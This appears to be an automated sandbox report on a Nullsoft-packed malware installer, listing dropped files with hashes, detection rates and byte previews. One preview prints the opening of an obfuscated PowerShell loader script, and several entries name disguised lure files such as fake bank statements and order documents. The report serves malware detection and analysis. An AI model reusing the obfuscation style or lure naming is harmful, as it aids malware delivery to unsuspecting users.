                                                SSDEEP:1536:HSB2wWSB2wJSjlK/5luiJgv239rKPR39rgaX39r63Jga73wthKXqPXK539rQOthL:HaQaLZN3BY3Bj3BSS+X3B9+g
                                                MD5:01B9328D272205AAF2B194EAA5F7B3AE
                                                SHA1:3C87ACECC403FD67A6D18B2E31666A0F042623B4
                                                SHA-256:22560DBA159875F291E6BB20B581D331DEB62137F5658A69FA6745BF4D9C92D2
                                                SHA-512:186E482B24E1B612545DD7BB59C12C00C40B806D5A4B118AC8416FF97E063D9E50252E573BB6B36DD4EA5EDD658F4B25F64FA2D8805752A8D0B328D394AC2FC4
                                                Malicious:false
                                                Preview:3..P... ................{..*...y......................1.q..........|.......|..h.s.........................4B...*...y..........................................................................................................bJ......n........................................................................................................... ............{...............................................................................................................................................................................................*...y_.................................=.u......|....................-......|...........................#......h.s.....................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\bhvAF03.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x33f90050, page size 32768, DirtyShutdown, Windows version 10.0
                                                Category:dropped
                                                Size (bytes):14680064
                                                Entropy (8bit):0.12080190500521996
                                                Encrypted:false
                                                SSDEEP:1536:HSB2wWSB2wJSjlK/5luiJgv239rKPR39rgaX39r63Jga73wthKXqPXK539rQOthL:HaQaLZN3BY3Bj3BSS+X3B9+g
                                                MD5:01B9328D272205AAF2B194EAA5F7B3AE
                                                SHA1:3C87ACECC403FD67A6D18B2E31666A0F042623B4
                                                SHA-256:22560DBA159875F291E6BB20B581D331DEB62137F5658A69FA6745BF4D9C92D2
                                                SHA-512:186E482B24E1B612545DD7BB59C12C00C40B806D5A4B118AC8416FF97E063D9E50252E573BB6B36DD4EA5EDD658F4B25F64FA2D8805752A8D0B328D394AC2FC4
                                                Malicious:false
                                                Preview:3..P... ................{..*...y......................1.q..........|.......|..h.s.........................4B...*...y..........................................................................................................bJ......n........................................................................................................... ............{...............................................................................................................................................................................................*...y_.................................=.u......|....................-......|...........................#......h.s.....................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\bhvF0DA.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x33f90050, page size 32768, DirtyShutdown, Windows version 10.0
                                                Category:dropped
                                                Size (bytes):14680064
                                                Entropy (8bit):0.12080190500521996
                                                Encrypted:false
                                                SSDEEP:1536:HSB2wWSB2wJSjlK/5luiJgv239rKPR39rgaX39r63Jga73wthKXqPXK539rQOthL:HaQaLZN3BY3Bj3BSS+X3B9+g
                                                MD5:01B9328D272205AAF2B194EAA5F7B3AE
                                                SHA1:3C87ACECC403FD67A6D18B2E31666A0F042623B4
                                                SHA-256:22560DBA159875F291E6BB20B581D331DEB62137F5658A69FA6745BF4D9C92D2
                                                SHA-512:186E482B24E1B612545DD7BB59C12C00C40B806D5A4B118AC8416FF97E063D9E50252E573BB6B36DD4EA5EDD658F4B25F64FA2D8805752A8D0B328D394AC2FC4
                                                Malicious:false
                                                Preview:3..P... ................{..*...y......................1.q..........|.......|..h.s.........................4B...*...y..........................................................................................................bJ......n........................................................................................................... ............{...............................................................................................................................................................................................*...y_.................................=.u......|....................-......|...........................#......h.s.....................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..

                                                C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):7680
                                                Entropy (8bit):5.1850294262777945
                                                Encrypted:false
                                                SSDEEP:96:8eD0AKTIfv7QCUsthvNL85s4lk38Eb3CDfvEh8uLzqkznLiEQjJ3KxkP:tZBfjbUA/85q3wEh8uLmaLpmP
                                                MD5:24DB082241ACE4ACA15BDF1E8460C92B
                                                SHA1:D317EF130AF6EA6A72A958EEE20A58568D38F23D
                                                SHA-256:D0607E535FF5573638EE1D70612E2239D5CB3C87307F48CFD57AA1C5CC0D9524
                                                SHA-512:EC1DCF17E2E72DBDF06D91250F0698CD50144836A1EE4A3E8A50605E27F8106DB595C61A81349A72CE652BC03AEE0033FED1700D87D8F2D0E4CD1DB9515E7EE2
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: r14836901-5B4A-.exe, Detection: malicious, Browse
                                                • Filename: r14836901-5B4A-.exe, Detection: malicious, Browse
                                                • Filename: Bootblacks.exe, Detection: malicious, Browse
                                                • Filename: Bootblacks.exe, Detection: malicious, Browse
                                                • Filename: Halkbank_Ekstre_06535798_98742134.pdf.exe, Detection: malicious, Browse
                                                • Filename: Halkbank_Ekstre_87762122_97575533.pdf.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L...M..Y...........!......................... ...............................P.......................................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):4096
                                                Entropy (8bit):3.286196206952677
                                                Encrypted:false
                                                SSDEEP:48:qKZ4n2rZ4vuXXqQr1wH+zL/o0o/X/3MVyjlZSDP15gaoFU:5O4ZxKQruHkJwvcVyoP4FU
                                                MD5:C051C86F6FA84AC87EFB0CF3961950A1
                                                SHA1:F18F4BB803099B80A3A013ECB03FEA11CFF0AC01
                                                SHA-256:D0949B4C0640EE6A80DB5A7F6D93FC631ED194DE197D79BF080EC1752C6F1166
                                                SHA-512:6E9DE5D07AAED2AC297FAA5049D567884D817ED94DECE055D96913AC8E497ADE6F0FF5C28BAE7CC7D3AC41F8795EFB9939E6D12061A3C446D5D2A3E2287D49D2
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: DriverUpdate.exe, Detection: malicious, Browse
                                                • Filename: DSOneApp(1).exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L...S..Y...........!................i........ ...............................P...................................... "......L ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...x....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):9728
                                                Entropy (8bit):5.067208332431121
                                                Encrypted:false
                                                SSDEEP:96:oCqZ4zC5RH3cXX1LlYlRowycxM2DjDf3GEst+Nt+jvDYx4iqndYHnxss:oCq+CP3uKrpyREs06Yx+dGn
                                                MD5:EE449B0ADCE56FBFA433B0239F3F81BE
                                                SHA1:EC1E4F9815EA592A3F19B1FE473329B8DDFA201C
                                                SHA-256:C1CC3AA4326E83A73A778DEE0CF9AFCC03A6BAFB0A32CEA791A27EB9C2288985
                                                SHA-512:22FB25BC7628946213E6E970A865D3FBD50D12CE559C37D6848A82C28FA6BE09FEDFFC3B87D5AEA8DCFE8DFC4E0F129D9F02E32DAE764B8E6A08332B42386686
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 2%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: RFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.com, Detection: malicious, Browse
                                                • Filename: RFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.com, Detection: malicious, Browse
                                                • Filename: RFQ#ORDER-PRODUCTION-24-091-06 -SUPPLY.com.exe, Detection: malicious, Browse
                                                • Filename: VSL'S PARTICULARS FOR TRUE-COMPASS V2406.docx.com.exe, Detection: malicious, Browse
                                                • Filename: RFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.com.exe, Detection: malicious, Browse
                                                • Filename: RFQ#ORDER-PRODUCTION-24-091-06 -SUPPLY.com.exe, Detection: malicious, Browse
                                                • Filename: VSL'S PARTICULARS FOR TRUE-COMPASS V2406.docx.com.exe, Detection: malicious, Browse
                                                • Filename: RFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.com.exe, Detection: malicious, Browse
                                                • Filename: ______-POORD210865679-09XY-21-Order.com.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L...P..Y...........!......... ...............0.......................................................................6..k....0.......`.......................p.......................................................0...............................text...Q........................... ..`.rdata..{....0......................@..@.data........@......................@....rsrc........`....... ..............@..@.reloc..l....p......."..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nsc1247.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):477672
                                                Entropy (8bit):7.3830024168217925
                                                Encrypted:false
                                                SSDEEP:12288:d9YICgHLJOdXHEWyT2722TCM9nOG/cO55:fYIBJOdS72TCMTkO
                                                MD5:0AAE89D83E2E237DA1DA848AB00EDB56
                                                SHA1:A7200FC7C366ADAB3AC36E86749ACE7972ED9868
                                                SHA-256:D2876C6FB404B9DA41446308B3A58F535514FBD8301039906DF5C1BBEAA41AC8
                                                SHA-512:F369D5D1D8981B59E48313A2E8E75FC6BCF32D4D9DEC65B9FDE723CD45FE27E004A2A6609C5FE5FCAED76289B45275EFFE3F3211AB3E2DF2FC249AC9925CC6EA
                                                Malicious:false
                                                Preview:........,...................q... ...........................................................................................................................................................................................................................................................J...[...............j...............................................................................................................................b...............I.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..

                                                C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):71748
                                                Entropy (8bit):5.220315698035117
                                                Encrypted:false
                                                SSDEEP:1536:DDwlPzV4Fn5Wm1flOf6YwkXjvVw92tCsyBjIHOJwvzQCmU65:38yF5Wu9hxkXjvVc2TitmvzQZU65
                                                MD5:A2D89F4D3B619450083C55932293F2CF
                                                SHA1:F4975DD0B85438166922A4130DBBE8A058FC009A
                                                SHA-256:008302E66DF0902BDD917AAC31979F6A3B248189FADD2CE84C42E3E6618DC8C3
                                                SHA-512:5A4D8DA3322D2734DC277A5168DB4A00FB8EE5DC1B19BABA5357AD4BAF39BEFA78AB090DFBDD1688635B3E91140DE2BC7F65DE7754A7B19F7CDAEB9F4AE73CD7
                                                Malicious:true
                                                Preview:$Nouriture=$Histolaborantialis;<#Anatoxins Scripternes Blodsprngt #><#Multanimous Betonkanonens Overnatningsmulighedens #><#Fingerbllene Bethink legemerne Yelpers neurologer #><#Spalteliges Firevrelseslejlighed Ramed drmmebilledes irrecognizable Majoritet #><#Realisationsprisen Innovator Pingeling Lugernes koft #><#Ralliker Noah Sikkerhedstjenesten Visard Brisselragouter Rundstykkers Touperet #>$vsensforskellenes = "Daaerne;Exh,lar`$BilligsSNepalsiuTurlupipS.ightieZ,arialrRamosedmaflbs.roHolkf nr ,maatioDrowninsMisocaiePolle inStrikkeeRad.nspsDeklasss Titula= hyos,a`$ProtonePOverskya,ankoplrUnte,pet Be.kftiLeci,hoa TypogrlForvento Dyr habFarthi.lggemaddiRustlepgDuksedraBegmndetPatag.niSandm.soProteronSolitareAu olitr,agerrenBestikke Longits Kugler;Helt.lsFBracerouM nopoln satisfcAscendetP,leynmi Over.ro Ste.ghnOverspr Derus,ARegist,fSynkrons KohenrkSonderiyNoncontdSpumonenBarrateiPressivnIsne,ergGoyimkae Iodider PejlstnisolereeCyclisisBip.ane Att naa(Subdent`$ Obli,ac TilbehaTertiarpI

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Helseforretningens.str

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):344543
                                                Entropy (8bit):7.630340676453064
                                                Encrypted:false
                                                SSDEEP:6144:RX2X1mbYg3cXeryZWBoFK88LI4dKKOaEXHp7CWs2wx/sJ6Fh2722OKCqe:R9YICgHLJOdXHEWyT2722TC5
                                                MD5:2D9012D9A7BE9298B64873CE23AFCB6B
                                                SHA1:26111932D7A89DD087C1CD2CD1812AD9068A3EE3
                                                SHA-256:C481F233E1E2FA5322C3444B51810742BD1E9D1A6A549BAA7B2A21378844D93D
                                                SHA-512:CEBEA6DE861B46F561F212423B81BF652CCB5BC57BDD960A449F0F89CD8D5A55B7B711A596972F2E4E86232C568E4DB3B3FB032184144B7FABCB1F4F17D92D0E
                                                Malicious:false
                                                Preview:.R..................x................ZZZ.........SS......1.......77......D..o....((...............`.ZZZ.....................0......'.7777..'.L....l..c.......9..............11.PP.............v...........999..........uuuuuu................nn.................................UU......@..&&&........EE................<..KK................/...............::::.###.....U............8.................................2........................__..........BB....../.]............___...BBB....................................._...(................````...............PP.V............:::.......hhhhhhhh.....JJ.......-......M.G.........e.....%%%%.............W.........]........................L.............}...###........Y.o...............H....44....@..X........B....22.3...>....`......|.......................YYY.<.....9.6...............RRRR........||.................... ..................................................NNNNNN.NN........,,,.G..;;..........YYY.......===./.../............ttt.ff..VVV.......$$..

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\braweling.ban

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):7661
                                                Entropy (8bit):4.873450928679742
                                                Encrypted:false
                                                SSDEEP:192:oBexGw4CNUs99q5UrUrcnEYWi2qwhXwKCk6:EexGw4C+s9l5I4Km
                                                MD5:4C32AE5B5D401F961380D7DAF3AFC365
                                                SHA1:0084D96D3E973D9E0A8054EF6098BE3F36C9816D
                                                SHA-256:98CC30B99717B7753F039609A9EF76553A9C2B0DFDADBCDF962FC95384173792
                                                SHA-512:27E629328C359B48D56033DE2C3811FB44C2F15EBC43108CC5BB8F69E9130006C4745C312CC4922514318F3C9E93964E4F8C58C7F4A78FF0796579817CE7D1C6
                                                Malicious:false
                                                Preview:...........0..........p...u.............."..h..,.=................e.........'............@........./....Q..+.-....N... .t.4.....U..:X...v...\.O....`^.......9....,..........}a....7.....%#........(.................Z;..y.?.|.`.F..<9.qv#.g.D.....O......N....C.Ol._.R...q.....ng...................."..z........}.....?....]C.-...............Y...W..}..........sx..Q.......O..]............~ ...L....n.*..=V........:..........hh......u........{..............xH..,...)H....P..............{.............I......R.,..[.Z...`8......i...f:e3......9......,.A.....jlr!...IwX....X<.....J..+.........b..8...I........9....c..............c..?....e].u.aV.....%.......7...o/_......3........n.........5.....e.........R.....[.......vB.........l@..I`.....!.c.Q........7....z..................&m..P....}.(._*..*.A.........!...\zl...............9......T..4.G....:..j... .........................d...................X........'R[^u.........b..[..?#....-..5....K.z.......2$...!.L..p....6!...*.E.................&..\.

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):554400
                                                Entropy (8bit):7.1313111477846975
                                                Encrypted:false
                                                SSDEEP:12288:WDkS/CNT9fM913qbLd+cUQj5X7JPKmdE9s4Jr:WDEc9tqb5akVPHE93N
                                                MD5:FC55407CC82612103C5971DCA1837D6B
                                                SHA1:01EFA90009900C64C846B7AC716DEA3C5F97C4E8
                                                SHA-256:C9736CDC4ADE9FDDB9B293E0366F182F972154D98169B58E532B7905C310BF97
                                                SHA-512:08EDFA8F06459AE170EA444664776E57836BD6142721D8DF663776051C8C6DAB98F7C8902848ED08E4311A858D95EB38D0DF13208F8E0144A2FA9FA1A90C0240
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                • Antivirus: Virustotal, Detection: 14%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...s..Y.................b...........3............@.......................................@.................................(........P..p............k.. ............................................................................................text...<`.......b.................. ..`.rdata..H............f..............@..@.data...8............z..............@....ndata.......P...........................rsrc...p....P.......~..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\flymekanikerne.con

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8136
                                                Entropy (8bit):4.8744228802078355
                                                Encrypted:false
                                                SSDEEP:192:umvO2UHW0DkAQ1mAerW1e63184s7+jkHYQBALB6klVxzf:uv26lzwQi1e4Ps7+w47L3hf
                                                MD5:3DECB5BC070963391ED24136D9D39633
                                                SHA1:CBA6B9B3C6421B020649FB07A418297D1BDA4F45
                                                SHA-256:91AA495BF1782F68AC5E779FDCBBA1B8CF131954F9C42176566472B597387BA0
                                                SHA-512:FF96EB145436C8814FACC71DDB5000E293B0610A9DD13A00E71D5BE5FFF57204DBBC0B6B8D3855A525FEACDF0631843010C45BABD4EF6F54C5AA54B13EC22949
                                                Malicious:false
                                                Preview:.......U.z...............%........~.t.............)..................E...r.._.?.u........d.....\.....>...K.............A....+c........J}.9...z.N..6@......_..9...Jw?.....'.'......W.........................w3..(.......0_..C.........&.....9S_.....B......./.......r.......>.[.Z........R..A....q.............Q...........u....I......c................K........A...........................F..1W...g..].s....i..y.....\B......D...v..........F...v..x......`......N.xq..........+......&..=....q...b.................f.S.....a .........M...6..i..Ju........e.p...........3....!.C..[/.b...............\..................a.......U.....(....X(HIaK.u...'.......f....e.<....r..I........q....'...:}....M..l.k..3._....Tv.......i.F.........u..w..HE... ...............N.....p..`........$...............|.s1h.....N........."...y.....f.D.~/......|.v..F...^|...............#........................l=.......................T.;...................U.....A....W....3 ...........o..................Z..@.........p..........

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\insensateness.lic

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5999
                                                Entropy (8bit):4.930999496749815
                                                Encrypted:false
                                                SSDEEP:96:NCsEB8dygfnrmDE82LCeSSYFGqAn1OaG1IsoJ9M30GKMRwf4Xs4QR:UsExCnqSLg9+GIsQm30aRy4MR
                                                MD5:18818318A7091F31A6673C1E6691893E
                                                SHA1:1BCB5CA319505BDC0466DDB93877A4A1E1A51F11
                                                SHA-256:315B816906EE577BA1BED2A2922C43BB1784CABFD8248EE5A5964F3B09BB41A9
                                                SHA-512:256F17D954CF295CA4D8025AC609D84E0010E11C81BA9184B0639BD866680D60DF3EB5C69DE81B539D735936BC5382F247236D488745BECAE731D491A6E5C1F5
                                                Malicious:false
                                                Preview:.Q....T.......m|...%.l..........M..>.z.".....v....^....B.......w..V.QU......br.....T..*.&.s]\..../...M...O..................'............9C.v...%.......M......,....a...dS.......G......E.............!m.........u.................2...q.....t..............iv....=...................V..........s....,.a......`............=.....l".N....n.N.......#...........|..................5...nl3.[............".J.T..{W.....f.c.....bzRN..U...m...;!...H).sN..2.X.........Z.&..............Q...'...U-.............3.$.........................X.D..d.......z. .....-.D...............9............+.T....C..........B......K.p..........(....Q.?%....8..h...s..[.N......s...]..l.....................(........A..................+J....m..O........]..\_.`......)...}.%..........h.........R......................^.~............?.H... y.z..............D.......3......=..............Y.....&o..........s...w.K}........w.........3...."1..a..v.........o......B...m:.....=.......#..N..3.......)..l*....T...H......h:.A.{|2....v.

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\metrocarcinoma.ref

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6134
                                                Entropy (8bit):4.885622669075655
                                                Encrypted:false
                                                SSDEEP:96:spFjZT61CS2EXhewGtdqTxOQ2GCxIJE/5jTVZomc91+Ra4O0tBVceGCUY6a:sjZgCghewGLqTxR2GCmG/XoL9vbCDH
                                                MD5:20CC3561DEE93C050A00596D8B8EE12F
                                                SHA1:055769FED332180B097366E5D8E54A4D4B941BE2
                                                SHA-256:4B1A99DD41C0242616390C0AA7C8C2AE08C1B306D794DE3188DFD0B49B1D6775
                                                SHA-512:2DABB57E35F00D25BA834D52AEF454185B4CB2E38F774096EA7D771D4374022E887E092D647AF8F898BB7F6B0BFEF5FDBBEE1F70BC9DC8A08AD6D9DC87B81CDF
                                                Malicious:false
                                                Preview:.......m..................X........q......8......6...c...K....+.H......v...6e...............v.A........u..h3.GC.....y....~.....q.G.&._...].........o@.3...^...AKz..0 $..................8......1..<........s...|7.....Kt..,.............I.......].l.,..D....u.............V...2......8*.........X...5.A.._U.......".......h.}...,..G.......U....|.....................A....1...m....i...........@.[.=..........VI...........}.o..C.U..}...w..........V..................:.........0....]./..r...x.W8...Z..w~........x...{...............d...{.\...........x.....J...5.G...............k........s.0..H.......y...G.....E...............v.......>.w4....C.w..J...;....R........*......n......B..D`.........W...`............O......."..y..B......n..7.....w.............lO...k.Z..N...........................#.D.........7.#...}..3....../...>......B..nM..k..........I.l......na.;.....o...........].......&.....s..z......|~..|...........f!.:.....d..u..............=^..V.mL.."..\.'*.8...}.S..........~........../......k.

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\radiosterilizing.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:TTComp archive data, binary, 2K dictionary
                                                Category:dropped
                                                Size (bytes):4113
                                                Entropy (8bit):4.8553310540222885
                                                Encrypted:false
                                                SSDEEP:96:zVcGBUehj1kyKmuE7RQZCEDc+IEtesKRLiyEqDmPIse:zVZBUevkBrCEDUE0DDmwse
                                                MD5:845A86A79FBA340CEF7233C6518F3D22
                                                SHA1:F8B8886D7E1ACCC8E025A78CB2940992E7D4DD71
                                                SHA-256:19B54368C848A4E46BF93C1BB3D4BF47B1FF965CAAB64D9099258B9B6B61CE76
                                                SHA-512:5C65FF32D15FB7EC3E0CE22F985222A069DFB1BFE636140E2DF85B22AD3998E062C76B4418FBBB3FF7953D71960E824EA7A27F161A22C4C9E32BD78934D84878
                                                Malicious:false
                                                Preview:..........*.*..a..i.F..g.]..........M.................../..y..................P.....................k..............o...^..... ..p...l...........pi....Y.......{.....6tZ...................).s.X.>.z.G..V..................._E....;.f.>&....l.Gm..........T..L............}............Z.....!...............N..........l..../?............-.".............`...}..~....-.OB...iR..............>.P.[M...........y..%........o........../i....`.S8..kYk...F.......>.....m.....j..4.....................P.O....-................{..G..I.................t..'....>....@...............m............d]..4.....G.....P......DO...............................&....`.6. ...W~........,)....(.9......"..B.4...._......;....A..I.4...../....z......]...a.........?.............9.G...&l.....~.....x....[..b...L.mP.....JT..98.......B....v.y....g.............Z..............go.......i........b..XX.....g........t...a......Lp....g....I.....]Cf....6..^....`...........b.E...B..Z.G...................'...e.........-..............*...

                                                C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\schuit.txt

                                                Download File
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):394
                                                Entropy (8bit):4.308939576739245
                                                Encrypted:false
                                                SSDEEP:12:5g2BJo6CWZ0LCc+TeGDQnPZnoxlOLMpkMJLLa37z9n:5DEX+6ZpUlOg6MJLYz9n
                                                MD5:DB59B30B63B1BB25574E79623913DF27
                                                SHA1:7BB0493C43C972B6B78B870B66F3BF093A85116D
                                                SHA-256:225D132CEF9273EE87874A67240E568E5F1D6A8056D531D66BEABCA99675CB7F
                                                SHA-512:9037D859F1F714E5910386D39C01A4DB429E80E16AE76AB077DAB56394A1CBC998F65199547CE8ADE833D8DF34AAFCAEB0D4C052E50D9F7DF74EEB0D4CDE1050
                                                Malicious:false
                                                Preview:neurologiske harmonierne subdiversify lablab skovbyggelinies watts samlivsforholdene appendiksen gyniatry afgiftsomraaderne farmaci..anklung emders udgangsvrdiernes.frijordens brnestolenes totaktere hyperspeculative fancifulness magnetstribes rgforgiftning.korruptionernes christences genanvendelsesloven spasmers discour pachometer,blodbgen cliqueyness afgiftsbelagt.startlers gagerne motoric,

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.1313111477846975
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Uundgaaelige.exe
                                                File size:554'400 bytes
                                                MD5:fc55407cc82612103c5971dca1837d6b
                                                SHA1:01efa90009900c64c846b7ac716dea3c5f97c4e8
                                                SHA256:c9736cdc4ade9fddb9b293e0366f182f972154d98169b58e532b7905c310bf97
                                                SHA512:08edfa8f06459ae170ea444664776e57836bd6142721d8df663776051c8c6dab98f7c8902848ed08e4311a858d95eb38d0df13208f8e0144a2fa9fa1a90c0240
